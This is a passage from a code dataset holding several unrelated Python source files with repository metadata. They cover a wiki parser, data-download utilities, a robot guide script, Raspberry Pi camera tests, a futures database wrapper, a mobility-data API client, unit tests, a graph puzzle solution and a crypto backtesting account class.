0\n\t\t\ttry:\n\t\t\t\tself.rules[i].process(builder, *groups)\n\t\t\texcept Exception as error:\n\t\t\t\tself._raise_exception(error, text, mstart, mend, builder, self.rules[i])\n\n\t\t\titer = mend - self._backup_iter\n\t\t\tmatch = self._re.search(text, iter)\n\t\telse:\n\t\t\t# no more matches\n\t\t\tif iter < end:\n\t\t\t\ttry:\n\t\t\t\t\tself.process_unmatched(builder, text[iter:])\n\t\t\t\texcept Exception as error:\n\t\t\t\t\tself._raise_exception(error, text, iter, end, builder)\n\n\tparse = __call__\n\n\tdef backup_parser_offset(self, i):\n\t\tself._backup_iter += i\n\n\t@staticmethod\n\tdef _raise_exception(error, text, start, end, builder, rule=None):\n\t\t# Add parser state, line count etc. 
to error, then re-raise\n\t\t# rule=None means error while processing unmatched text\n\t\tif isinstance(error, AssertionError):\n\t\t\terror = ParserError(str(error))\n\t\t\t# Assume any assertion is a parser check\n\n\t\tif hasattr(error, 'parser_offset'):\n\t\t\toffset = start + error.parser_offset\n\t\telse:\n\t\t\toffset = start\n\t\t\terror.parser_text = text[start:end]\n\t\t\terror.parser_builder = builder\n\t\t\terror.parser_rule = rule\n\n\t\terror.parser_offset = offset\n\t\terror.parser_line_offset = get_line_count(text, offset)\n\n\t\tif isinstance(error, ParserError):\n\t\t\traise error\n\t\telse:\n\t\t\traise # original error, do not change stack trace\n\n\ndef get_line_count(text, offset):\n\t'''Helper function used to report line numbers for exceptions\n\tthat happen during parsing.\n\t@param text: the text being parsed\n\t@param offset: character offset in this text\n\t@returns: a 2-tuple of the line and column that corresponds to this\n\toffset\n\t'''\n\t# line numbers start counting at 1, columns at 0\n\tif offset == 0:\n\t\treturn 1, 0\n\tslice = text[:offset]\n\tlines = slice.splitlines(1)\n\tif lines[-1].endswith('\\n'):\n\t\treturn len(lines) + 1, 0\n\telse:\n\t\treturn len(lines), len(lines[-1])\n","repo_name":"zim-desktop-wiki/zim-desktop-wiki","sub_path":"zim/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":13062,"program_lang":"python","lang":"en","doc_type":"code","stars":1788,"dataset":"github-code","pt":"68"} +{"seq_id":"29125527480","text":"import os\nfrom zipfile import ZipFile\n\n\nimport bs4\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n\ndef load_from_link(\n url: str,\n file_name: str,\n unzip_func,\n unzip_args: dict,\n extension: str = \"xml\",\n) -> str:\n \"\"\"\n download xml or zip file and extract it if the file value for extension is zip\n\n :parameter\n ----------\n\n :param url: Url of the file.\n :param file_name: Name you want to save the file with\n :param unzip_func: function to unzip the file downloaded\n :param unzip_args: arguments to pass in the unzip function\n :param extension: extension of file it will get from the url\n :return: file_name\n \"\"\"\n response = requests.get(url)\n with open(f\"{file_name}.{extension}\", \"wb\") as file:\n file.write(response.content)\n\n if extension == \"zip\":\n unzipped_file_path = unzip_func(**unzip_args)\n return unzipped_file_path\n return file_name\n\n\nclass Utility:\n \"\"\"\n All the utility function for the completion of the question.\n \"\"\"\n\n def __init__(self, filepath: str):\n self.filepath = filepath\n self.unzipped_file_path = None\n\n @classmethod\n def init_load(\n cls,\n file_link,\n extension: str,\n ):\n file_path = load_from_link(\n url=file_link,\n file_name=\"interview\",\n extension=extension,\n unzip_func=cls.unzip_file,\n unzip_args={\"filename\": \"interview\", \"extension\": extension}\n\n )\n return cls(filepath=file_path)\n\n @staticmethod\n def unzip_file(\n filename: str,\n key: str,\n root: str = \"../\",\n ):\n \"\"\"\n Takes in filename and unzips it, if the file name is not a zipfile it will raise BadzipFile error.\n\n :param filename:\n :param key: str to search in the file name\n :param root: path where to search the file.\n :return: str or None\n \"\"\"\n with ZipFile(filename, \"r\") as zipped_file:\n zipped_file.extractall()\n for dir_path, dir_names, file_names in os.walk(root):\n for file in file_names:\n if key in file.lower():\n return f\"{dir_path}/{file}\"\n return None\n\n\n\n def find_in_xml_file(\n 
self,\n        attrs: dict,\n    ) -> list[bs4.PageElement]:\n        \"\"\"\n        Finds the first element with the attributes given in :attrs\n\n        :param attrs: attributes associated with the element you want to find.\n        :return: treasure: contents of the first element in the xml file matching attrs\n        \"\"\"\n        with open(f\"{self.filepath}.xml\", \"r\") as xml_file:\n            soup = BeautifulSoup(xml_file, features=\"xml\")\n            treasure = soup.find(attrs=attrs)\n        return treasure.contents\n\n    def convert_to_csv(\n        self,\n        data: dict[str, list],\n        filename: str = \"result\",\n    ):\n        \"\"\"\n        Takes in a dictionary where each key(str) is treated as a column name and each value is treated as rows(should be a list), and\n        converts it to a csv file.\n\n        :parameter\n        ----------\n\n        :param data: Dict in form of {\"column_name\": [row_value_1, row_value_2], ..., }\n        :param filename: Name the file will be saved with.\n        :return: None\n        \"\"\"\n        data = pd.DataFrame(data=data)\n        data.to_csv(filename)\n\n\nLINK = \"https://registers.esma.europa.eu/solr/esma_registers_firds_files/select?q=*&fq=publication_date:%5B2021-01-17T00:00:00Z+TO+2021-01-19T23:59:59Z%5D&wt=xml&indent=true&start=0&rows=100\"","repo_name":"surajsarkar/assignment","sub_path":"utils/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11163251542","text":"import sys\nfrom modim_interaction import *\nfrom pddl2txt import *\nfrom scripts_ import *\n\n\ndestinations = {\"banca\": \"pos7_12\",\"fisiologia umana\" :\"pos12_7\",\"fisiologia generale\" :\"pos12_11\",\"botanica\":\"pos9_18\",\"genetica\":\"pos10_19\",\"medicina legale\":\"pos5_22\",\"obitorio\":\"pos5_22\",\"scienze statistiche\":\"pos13_5\",\"scienze politiche\":\"pos15_9\",\"ciao\":\"pos13_15\",\"lettere e filosofia\":\"pos16_20\",\"scienze umanistiche\":\"pos16_20\",\"laboratori chimica\":\"pos13_24\",\"fisica\":\"pos23_14\",\n                \"chimica\":\"pos23_16\",\"chimica farmaceutica\":\"pos21_22\",\"geologia\":\"pos18_10\",\"giurisprudenza\":\"pos17_12\",\n                \"matematica\":\"pos19_22\",\"igiene\":\"pos27_14\",\"zoologia\":\"pos21_6\",\"neurologia\":\"pos24_6\",\"scienze dello spettacolo\":\"pos27_8\",\"ortopedia\":\"pos27_15\"}\n\nvocab = ['banca', 'fisiologia', 'botanica', 'genetica', 'medicina', 'obitorio', 'scienze statistiche', 'scienze politiche', 'ciao',\n        'lettere e filosofia', 'scienze umanistiche', 'laboratori chimica', 'fisica', 'chimica', 'chimica farmaceutica', 'geologia',\n        'giurisprudenza', 'matematica', 'igiene', 'zoologia', 'neurologia', 'scienze dello spettacolo', 'ortopedia']\n\nspeech = Speech()\ngesture = Gestures()\ndef main_run():\n    \n    interaction = start_interaction(speech)\n    \n    if (interaction):\n        speech.say(\"Do you need indications or do you want to play?\")\n        rightanswer=False\n        while(not rightanswer):\n            answer = speech.listen()\n            \n            if answer == \"Indications\":\n                rightanswer = True\n                \n                speech.say(\"Perfect! 
Where do you have to go?\")\n                goal = speech.listen(vocabulary=vocab)\n                \n                if (goal not in vocab):\n                    find = False\n                    \n                    while(not find):\n                        speech.say(\"Sorry I didn't understand, can you repeat please?\")\n                        goal = speech.listen(vocabulary=vocab)\n                        \n                        if (str(goal) in vocab):\n                            find=True\n\n                speech.say(\"Ok, now use the tablet to press on the cells that contain obstacles; if there are none, press the Ok button\")\n                \n                #take the cell position\n                \n                for pos in destinations:\n                    if (pos == goal):\n                        goal = destinations[pos]\n                \n                #modify the javascript of the grid\n                with open(\"../grid.js\",\"r\") as f:\n                    js_file = f.readlines()\n                    f.close()\n                gg = goal.strip(\"pos\\n\").split(\"_\")\n                \n                js_file[0] = \"var goalx = \"+gg[0]+\";\\n\"\n                js_file[1] = \"var goaly = \"+gg[1]+\";\\n\"\n                with open(\"../grid.js\",\"w\") as f:\n                    for js_line in js_file:\n                        f.write(js_line)\n                    f.close()\n                \n                #OPEN THE MAP INTERACTION ON THE TABLET\n                TabletInteraction(\"i1\")\n                \n                speech.say(\"Please wait, I'm computing the best path for you\")\n                \n                with open(\"../utils/obs.out\",\"r\") as f:\n                    obs = f.readline()\n                    f.close()\n                obs = obs.strip(\"\\n\")\n\n                img_p = create_problem(obs,goal)\n                \n                with open(\"../actions/quit\",\"r\") as f:\n                    lines = f.readlines()\n                    f.close()\n                lines[1] = \"<*,*,*,*>: img/\"+img_p+\"\\n\"\n                \n                with open(\"../actions/quit\",\"w\") as f:\n                    for line in lines:\n                        f.write(line)\n                    f.close()\n                \n                speech.say(\"I'm ready! Look at my tablet to see your path\")\n                \n                TabletInteraction(\"i3\")\n                \n                speech.say(\"I hope it helped, see you next time bye!\")\n                gesture.sayhi()\n            \n            elif answer==\"Play\":\n                rightanswer = True\n                speech.say(\"Perfect! Let's play a memory game on the tablet\")\n                #OPEN THE GAME INTERACTION ON THE TABLET\n                \n                TabletInteraction(\"i2\")\n                \n                speech.say(\"I hope you had fun, see you next time bye!\")\n                gesture.sayhi()\n            else:\n                speech.say(\"Sorry, I didn't understand\")\n    return\n    \nif __name__ == \"__main__\":\n\n    while True:\n        try:\n            sonar = Sonar()\n            check = sonar.listen(detected=False)\n            if check == 'front':\n                main_run()\n        except KeyboardInterrupt:\n            print(\"Interrupted\")\n            Reset()\n            sys.exit(0)\n","repo_name":"onaidra/EAI2","sub_path":"EAI2Project/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31008027115","text":"#!/usr/bin/env python3\n\nimport time # For time keeping\nimport picamera # For interfacing with the PiCamera\nimport RPi.GPIO as gpio # For controlling the GPIO pins\n\n\nSEL_1 = 22\nSEL_2 = 23\nLED_GREEN = 24\nLED_BTM = 26\nLED_AMBER = 27\n\n# Initialize GPIO pins\ngpio.setmode(gpio.BCM)\ngpio.setup(SEL_1, gpio.OUT) # select 1\ngpio.setup(SEL_2, gpio.OUT) # select 2\ngpio.setup(LED_GREEN, gpio.OUT) # status led1\ngpio.setup(LED_AMBER, gpio.OUT) # status led2\ngpio.setup(LED_BTM, gpio.OUT) # status led3\n\n# Turn off LEDs\ngpio.output(LED_GREEN, True)\ntime.sleep(0.1)\ngpio.output(LED_AMBER, True)\ntime.sleep(0.1)\ngpio.output(LED_BTM, False)\n\nRESOLUTION = (1280, 720)\n\ndef blink(pin, repeat, interval):\n    on = False\n    off = True\n    if pin == LED_BTM:\n        on = True\n        off = False\n    for i in range(repeat):\n        gpio.output(pin, on)\n        time.sleep(interval)\n        gpio.output(pin, off)\n        time.sleep(interval)\n\n# For Selecting Cam and taking + saving a picture\ndef camcapture(_cam, _camno):\n    print('selectcam( ', _camno, ' )')\n    if _camno < 1 or _camno > 3:\n        print('[selectcam] invalid cam number!')\n    else:\n        if _camno == 1:\n            print(\"select cam 1\")\n            gpio.output(SEL_1, False)\n            
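# with both select lines low, the camera multiplexer routes to port 1 (SEL_1/SEL_2 are raised for cams 2 and 3 below)\n            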
gpio.output(SEL_2, False)\n if _camno == 2:\n print(\"select cam 2\")\n gpio.output(SEL_1, True)\n gpio.output(SEL_2, False)\n if _camno == 3:\n print(\"select cam 3\")\n gpio.output(SEL_1, True)\n gpio.output(SEL_2, True)\n time.sleep(0.2)\n dir = '/home/pi/Desktop/cam-tests/'\n photoname = dir + 'cam' + str(_camno) + '.jpg'\n print(photoname)\n _cam.capture(photoname)\n print('cam', str(_camno), '- picture taken!')\n\ndef main():\n # Hello blinks\n blink(LED_GREEN, 2, 0.1)\n blink(LED_AMBER, 2, 0.1)\n blink(LED_BTM, 2, 0.1)\n\n # Initialize camera object\n print('initializing camera')\n gpio.output(SEL_1, False)\n gpio.output(SEL_2, False)\n time.sleep(0.1)\n cam = picamera.PiCamera()\n cam.resolution = RESOLUTION\n\n # take three pictures\n camcapture(cam, 1)\n camcapture(cam, 2)\n camcapture(cam, 3)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mbaytas/capra","sub_path":"tests/cam-test.py","file_name":"cam-test.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"41077100538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nget future info from file or database\n\"\"\"\nimport os\nimport pandas as pd\n\nfrom Quant.instrument import Instrument\nfrom utils import LogHandler\n\nlog = LogHandler('future')\n\n\nclass Future(Instrument):\n future_dir = os.path.join(Instrument.base_dir, 'future')\n if not os.path.exists(future_dir):\n os.makedirs(future_dir)\n\n def __init__(self, market='dce', period='day'):\n super(Future, self).__init__(market, period)\n self.db = self.mongo['futures']\n\n def variety(self, market='', varietyid=''):\n filter_dict = {}\n if market:\n filter_dict['market'] = market\n\n if varietyid:\n filter_dict['varietyid'] = varietyid.upper()\n\n return self.find(self.db['variety'], filter_dict)\n\n def contract(self, market='', varietyid='', contractid='', update=''):\n filter_dict = {}\n\n if market:\n filter_dict['market'] = market\n if contractid:\n filter_dict = {'contractid': contractid.lower()}\n if varietyid:\n filter_dict['varietyid'] = varietyid.upper()\n if update:\n update = int(update.strftime('%Y%m%d'))\n filter_dict['end'] = {'$gt': update}\n\n return self.find(self.db['contract'], filter_dict)\n\n def option(self, market='', varietyid='', contractid='', update=''):\n filter_dict = {}\n\n if market:\n filter_dict['market'] = market\n if contractid:\n filter_dict = {'contractid': contractid.lower()}\n if varietyid:\n filter_dict['varietyid'] = varietyid.upper()\n if update:\n update = int(update.strftime('%Y%m%d'))\n filter_dict['end'] = {'$gt': update}\n\n return self.find(self.db['option'], filter_dict)\n\n\nif __name__ == '__main__':\n future = Future()\n print(future.contract().tail())\n print('====================================================')\n print(future.contract(contractid='i1801').tail())\n print('====================================================')\n print(future.contract(varietyid='i').tail())\n print('====================================================')\n print(future.contract(varietyid='ii'))\n print('====================================================')\n import datetime as dt\n\n print('====================================================')\n print(future.contract(varietyid='i', update=dt.datetime.now()).tail())\n print('====================================================')\n print(future.contract(update=dt.datetime.now()).tail())\n print(future.contract(market='DCE', update=dt.datetime.now()).tail())\n 
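# a minimal usage sketch of the option() lookup defined above; the variety id 'm' is a hypothetical example\n    print(future.option(varietyid='m', update=dt.datetime.now()).tail())\n    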
print('====================================================')\n # print(future.variety())\n # print(future.variety(market='大连交易所'))\n # print('====================================================')\n # print(future.variety(market='大连商品交易所'))\n # print('====================================================')\n # print(future.variety(market='大连商品交易所', varietyid='i'))\n # print(future.variety(varietyid='i'))\n # print(future.variety(varietyid='ii'))\n","repo_name":"newlyedward/Crawler","sub_path":"Quant/future.py","file_name":"future.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38626833408","text":"\"\"\"\nClass: MDSClient\n\nAuthor: Austin Transportation Department, Data and Technology Services\n\nDescription: The purpose of this class is to provide an extensible architecture that\nallows different MDS client versions, it basically acts as an abstraction layer\nand the actual implementation is unique per MDS client class.\n\nThe application requires the requests library:\n https://pypi.org/project/requests/\n\"\"\"\nfrom .clients import *\nfrom .MDSAuth import MDSAuth\n\n# Debug & Logging\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\nclass MDSClient:\n __slots__ = (\n \"config\",\n \"authenticated\",\n \"mds_headers\",\n \"auth_headers\",\n \"version\",\n \"provider\",\n \"custom_client\",\n \"auth_client\",\n \"mds_client\",\n \"custom_authentication\",\n )\n\n def __init__(self, config={}, custom_authentication=None, **kwargs):\n \"\"\"\n Constructor for this class\n :param dict config: A dictionary of properties.\n :param function custom_authentication: A python function to use for authentication\n :param dic kwargs: Any additional parameters passed to subclasses\n\n Parameters:\n :param str version: The version of the mds library to be loaded.\n :param dict config: The configuration to be passed to the\n :param str provider: The provider name or UUID\n \"\"\"\n # Merge config and kwargs into a single dictionary\n self.config = {**config, **kwargs}\n\n # Try to find in the config the MDS version we are working with\n self.provider = self.config.get(\"provider\", None)\n # Tries to find version in the config, or assumes 0.2.0\n self.version = self.config.get(\"version\", \"0.2.0\")\n # Try to find the default_class (an MDS class override) or assume None\n self.custom_client = self.config.get(\"custom_client\", None)\n # Assume the headers to be empty\n self.mds_headers = None\n self.auth_headers = None\n # Assume authenticated is False\n self.authenticated = False\n\n # Try to find a custom authentication function, assume None\n self.custom_authentication = custom_authentication\n\n # Initialize authentication client\n self.auth_client = MDSAuth(\n config=self.config, custom_function=self.custom_authentication\n )\n\n # Initialize MDS Client\n self.mds_client = self.load_mds_client(\n version=self.version, custom=self.custom_client,\n )(config=self.config)\n\n self._load_custom_headers()\n self._authenticate()\n\n @staticmethod\n def load_mds_client(version, custom=None):\n \"\"\"\n Returns the class reference to be initialized later.\n :param str version: The version of MDS to initialize\n :param object custom: MDS Class override option\n :return object: The MDS class to be used\n \"\"\"\n # Check for class override\n if custom is not None:\n return custom\n # Proceed with normal version check & load class\n 
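# (an unknown version string falls through to .get's default, which is None when no custom class was given)\n        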
else:\n            return {\n                \"0.2.0\": MDSClient020,\n                \"0.3.0\": MDSClient030,\n                \"0.4.0\": MDSClient040,\n            }.get(version, custom)\n\n    def _load_custom_headers(self):\n        logging.debug(f\"MDSClient::_load_custom_headers() Loading custom headers...\")\n        custom_headers = self.config.get(\"headers\", {})\n        for key, value in custom_headers.items():\n            self.mds_client.set_header(key=key, value=value)\n\n    def get_trips(self, start_time, end_time):\n        \"\"\"\n        Returns the trips for the current client\n        :param start_time:\n        :param end_time:\n        :return:\n        \"\"\"\n        logging.debug(f\"MDSClient::get_trips() Getting trips for start_time: {start_time}, end_time: {end_time} \")\n        return self.mds_client.get_trips(\n            start_time=start_time, end_time=end_time\n        )\n\n    def show_config(self):\n        \"\"\"\n        Logs (at debug level) the current version & configuration of the client\n        :return:\n        \"\"\"\n        logging.debug(f\"MDSClient::show_config() Current MDS version loaded: {self.mds_client.version}\")\n        logging.debug(self.mds_client.config)\n\n    def _authenticate(self):\n        \"\"\"\n        It authenticates the client using the provided configuration\n        :return:\n        \"\"\"\n        logging.debug(\"MDSClient::authenticate() Generating headers...\")\n        self.auth_headers = self.auth_client.authenticate()\n        logging.debug(\"MDSClient::authenticate() Checking headers...\")\n        if self.auth_headers:\n            logging.debug(\"MDSClient::authenticate() Authentication succeeded...\")\n            self.authenticated = True\n\n            self.mds_client.set_header(\n                \"Accept\", f\"application/vnd.mds.provider+json;version={self.version[:3]}\"\n            )\n            self.mds_client.render_settings(headers=self.auth_headers)\n\n            logging.debug(\"MDSClient::authenticate() Final headers: \")\n            logging.debug(self.mds_client.get_headers())\n\n        else:\n            logging.debug(\"MDSClient::authenticate() Authentication failed\")\n","repo_name":"cityofaustin/atd-mds-client","sub_path":"mds/MDSClient.py","file_name":"MDSClient.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"29741747271","text":"print('hey, this is a new repo')\n\n\ndef merged(list1, list2):\n    list1.extend(list2)\n    for element in list1[:]:\n        if list1.count(element) >= 2:\n            list1.remove(element)\n    return list1\n\nlist1 = [1, 2, 3, 4, 5, 6]\nlist2 = [4, 5, 6, 7, 8, 9]\n\nprint(merged(list1, list2))\n\n\nprint('and this is a change for the new branch')\nprint('hey, I love you')\n","repo_name":"borowkatraktor/probne_repo","sub_path":"pierwszy.py","file_name":"pierwszy.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36218062082","text":"from cachetools import TTLCache\n\nfrom data import Table, RowTable\n\n\nprofile_tags = Table('member_profile_tags', attach_as='profile_tags')\n\n\n@profile_tags.save_query\ndef get_tags_for(guildid, userid):\n    rows = profile_tags.select_where(\n        guildid=guildid, userid=userid,\n        _extra=\"ORDER BY tagid ASC\"\n    )\n    return [row['tag'] for row in rows]\n\n\nweekly_goals = RowTable(\n    'member_weekly_goals',\n    ('guildid', 'userid', 'weekid', 'study_goal', 'task_goal'),\n    ('guildid', 'userid', 'weekid'),\n    cache=TTLCache(5000, 60 * 60 * 24),\n    attach_as='weekly_goals'\n)\n\n\n# NOTE: Not using a RowTable here since these will almost always be mass-selected\nweekly_tasks = Table('member_weekly_goal_tasks')\n\n\nmonthly_goals = RowTable(\n    'member_monthly_goals',\n    ('guildid', 'userid', 'monthid', 'study_goal', 'task_goal'),\n    ('guildid', 'userid', 'monthid'),\n    
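# same 5000-entry, 24-hour TTL cache as weekly_goals above\n    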
cache=TTLCache(5000, 60 * 60 * 24),\n attach_as='monthly_goals'\n)\n\nmonthly_tasks = Table('member_monthly_goal_tasks')\n","repo_name":"justw0rk/StudyLion","sub_path":"bot/modules/stats/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"34376439730","text":"from hypothesis import given\n\nfrom tumpara.api.filtering import NumericFilter\nfrom tumpara.content.gallery.api.filtersets import PhotoFilterSet\nfrom tumpara.content.gallery.models import Photo\nfrom tumpara.storage.models import Library\nfrom tumpara.testing import strategies as st\n\nfrom ..test_timeline.test_entry_filtersets import check_results\n\n\n@st.composite\ndef datasets(draw: st.DataObject.draw) -> st.SearchStrategy[set[Photo]]:\n library = Library.objects.create(source=\"file://\", context=\"testing\")\n return draw(\n st.sets(\n st.from_model(Photo, library=st.just(library), archived=st.just(False)),\n min_size=2,\n )\n )\n\n\n@given(datasets())\ndef test_width_filtering(django_executor, photos: set[Photo]):\n \"\"\"The width filter gets passed along correctly.\"\"\"\n # Using the median value as the limiting value here makes sure that at least one\n # photo is filtered out and at least one stays in.\n median_value = sorted(photos, key=lambda photo: photo.width)[\n int(len(photos) / 2)\n ].width\n check_results(\n {photo for photo in photos if photo.width >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n width=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_height_filtering(django_executor, photos: set[Photo]):\n \"\"\"The height filter gets passed along correctly.\"\"\"\n median_value = sorted(photos, key=lambda photo: photo.height)[\n int(len(photos) / 2)\n ].height\n check_results(\n {photo for photo in photos if photo.height >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n height=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_smaller_axis_filtering(django_executor, photos: set[Photo]):\n \"\"\"The filter for the smaller axis gets passed along correctly.\"\"\"\n median_photo = sorted(photos, key=lambda photo: min(photo.width, photo.height))[\n int(len(photos) / 2)\n ]\n median_value = min(median_photo.width, median_photo.height)\n check_results(\n {photo for photo in photos if min(photo.width, photo.height) >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n smaller_axis=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_larger_axis_filtering(django_executor, photos: set[Photo]):\n \"\"\"The filter for the larger axis gets passed along correctly.\"\"\"\n median_photo = sorted(photos, key=lambda photo: max(photo.width, photo.height))[\n int(len(photos) / 2)\n ]\n median_value = max(median_photo.width, median_photo.height)\n check_results(\n {photo for photo in photos if max(photo.width, photo.height) >= median_value},\n types=[\"Photo\"],\n photo_filters=PhotoFilterSet._meta.container(\n larger_axis=NumericFilter._meta.container(minimum=median_value)\n ),\n )\n\n\n@given(datasets())\ndef test_megapixel_filtering(django_executor, photos: set[Photo]):\n \"\"\"The megapixel count filter gets passed along correctly.\"\"\"\n median_value = sorted(photos, key=lambda photo: photo.megapixels)[\n int(len(photos) / 2)\n ].megapixels\n check_results(\n {photo 
for photo in photos if photo.megapixels >= median_value},\n        types=[\"Photo\"],\n        photo_filters=PhotoFilterSet._meta.container(\n            megapixels=NumericFilter._meta.container(minimum=median_value)\n        ),\n    )\n","repo_name":"tumpara/server","sub_path":"tests/test_gallery/test_filtersets.py","file_name":"test_filtersets.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"26542393149","text":"class UF:\n    def __init__(self):\n        self.root = {}\n    \n    def insert(self, a: int) -> None:\n        if a not in self.root:\n            self.root[a] = a\n    \n    def find(self, a: int) -> int:\n        self.insert(a)\n        if self.root[a] != a:\n            self.root[a] = self.find(self.root[a])\n        return self.root[a]\n    \n    def union(self, a: int, b: int) -> None:\n        a, b = self.find(a), self.find(b)\n        if a != b:\n            self.root[b] = a\n\nclass Solution:\n    def minScore(self, n: int, roads: List[List[int]]) -> int:\n        uf = UF()\n        for u, v, _ in roads:\n            uf.union(u, v)\n        res = float(\"inf\")\n        root = uf.find(1)\n        for u, v, d in roads:\n            u, v = uf.find(u), uf.find(v)\n            if u == root or v == root:\n                res = min(res, d)\n        return res\n        \n        # NOTE: the DFS variant below is an alternative solution kept for reference; it is unreachable after the return above\n        graph = {}\n        for u, v, d in roads:\n            if u not in graph:\n                graph[u] = []\n            if v not in graph:\n                graph[v] = []\n            graph[u].append([v, d])\n            graph[v].append([u, d])\n        \n        def dfs(n: int, seen: set) -> int:\n            nonlocal graph\n            seen.add(n)\n            res = float(\"inf\")\n            for next, d in graph[n]:\n                res = min(res, d)\n                if next not in seen:\n                    res = min(res, dfs(next, seen))\n            return res\n        \n        return dfs(1, set())","repo_name":"cli3338198/leetcode","sub_path":"2492-minimum-score-of-a-path-between-two-cities/2492-minimum-score-of-a-path-between-two-cities.py","file_name":"2492-minimum-score-of-a-path-between-two-cities.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"4661898180","text":"# -*- coding:utf-8 -*-\n__author__ = 'xin'\n\n\"\"\"\nThis file creates virtual (paper-trading) accounts\n\"\"\"\n# from Data.dataMain import HistoryData\nfrom pprint import pprint\nimport talib\nimport numpy as np\nfrom collections import OrderedDict\nimport datetime\nfrom Strategy.strategySpotMain import Strategy\nimport copy\n\n\nclass Order(object):\n    def __init__(self, symbol, amount, time=None, type='market', price=0.):\n        self.order_time = '' # time the order was issued (datetime)\n        self.symbol = symbol # trading instrument\n        self.type = type # order type\n        self.price = price # price\n        self.amount = amount # ordered quantity\n\n        pass\n\n\nclass Account(object):\n    # initial setup\n    def __init__(self, init_dict, strategy_arg):\n        self.strategy_arg = strategy_arg\n\n        # TODO needs changing for multiple currencies; currently settled in BTC\n        self.symbol_list = init_dict['symbol_list'] # symbol list\n        self.cash = copy.deepcopy(init_dict['cash']) # initial amount\n        self.balance_dict = copy.deepcopy(init_dict['cash']) # account balances\n        self.btc_balance = [] # records the changing BTC balance\n        self.free_cash = copy.deepcopy(init_dict['cash']['BTC']) # funds available for use\n        self.today_symbol_price = {} # records today's prices\n        self.firstday_symbol_price = {} # records the first day's prices\n        self.end_balance = 0\n\n        self.para_allowCash = 0 # minimum capacity the strategy allows, computed on the last day\n        self.allow_min_coin_dict = {} # minimum amount per coin\n\n        for symbol in init_dict['symbol_list']:\n            self.today_symbol_price[symbol] = np.nan\n            self.firstday_symbol_price[symbol] = np.nan\n\n        self.historyOrder_list = [] # historical orders\n        self.historyLimitOrder_list = []\n\n        self.buy_fee = init_dict['fee']['buy_fee'] # fee for opening a position\n        self.sell_fee = init_dict['fee']['sell_fee'] # fee for closing a position\n\n        
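# per-timestamp record of executed buy/sell prices (np.nan on bars with no trade; filled in handle_signal/handle_balance)\n        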
self.buy_openPrice_dict = {}\n        self.sell_openPrice_dict = {}\n\n        self.csv_time_list = []\n        self.csv_signal_dict = {}\n        self.csv_amount_dict = {}\n        self.csv_balance_dict = {}\n        self.csv_dataPrice_list = []\n\n        for symbol in init_dict['cash']:\n            self.csv_balance_dict[symbol] = []\n\n    # get the historical orders\n    def get_user_history_orders(self):\n        # print('historical orders', self.historyOrder_list)\n        return self.historyOrder_list\n\n    # get the open position orders\n    def get_user_orders(self):\n        # TODO return the historical orders\n        return self\n\n    def get_history(self, symbol, start, end, freq):\n        \"\"\"\n        Get historical data\n        :param symbol: trading instrument\n        :param start: start time\n        :param end: end time\n        :param freq: time period\n        :return: { symbol : {closePrice:[ , , ,],\n                             openPrice:[ , , ,],\n                             highPrice:[ , , ,],\n                             }\n        \"\"\"\n        # NOTE: the HistoryData import is commented out at the top; this call fails unless it is restored\n        return HistoryData().get_history_data()\n\n    # get the previous period's price data\n    def get_before_data(self, data, i):\n        try:\n            before_data = data.ix[:i+1, :]\n        except:\n            before_data = None\n        # print('before_data',before_data)\n        return before_data\n\n    # get the signal\n    def handle_signal(self, info, data, i):\n        today = data.index[i]\n        # today_str = datetime.datetime.strftime(today, \"%Y-%m-%d %H:%M:%S\")\n        price = data[data.columns[0]][i]\n        try:\n            today_next = data.index[i + 1]\n        except:\n            today_next = np.nan\n\n        try:\n            price_next = data[data.columns[0]][i + 1]\n        except:\n            price_next = np.nan\n\n        self.csv_signal_dict[today] = ''\n        self.csv_amount_dict[today] = np.nan\n        self.buy_openPrice_dict[today] = np.nan\n        self.sell_openPrice_dict[today] = np.nan\n\n        if info:\n            if info['type'] == 'limit':\n                order_info = {}\n                order_info['id'] = info['id']\n                order_info['price'] = info['price']\n                order_info['symbol'] = info['symbol']\n                order_info['date_time'] = today_next\n                order_info['side'] = info['side']\n                order_info['amount'] = info['amount']\n                order_info['type'] = info['type']\n\n                self.historyLimitOrder_list.append(order_info)\n\n            else:\n                print('signal occurred')\n                # print('next time {} - price {}'.format(today_next, price_next))\n                order_info = {}\n                order_info['id'] = info['id']\n                order_info['price'] = price_next\n                order_info['date_time'] = today_next\n                order_info['symbol'] = info['symbol']\n                order_info['side'] = info['side']\n                order_info['amount'] = info['amount']\n                order_info['type'] = 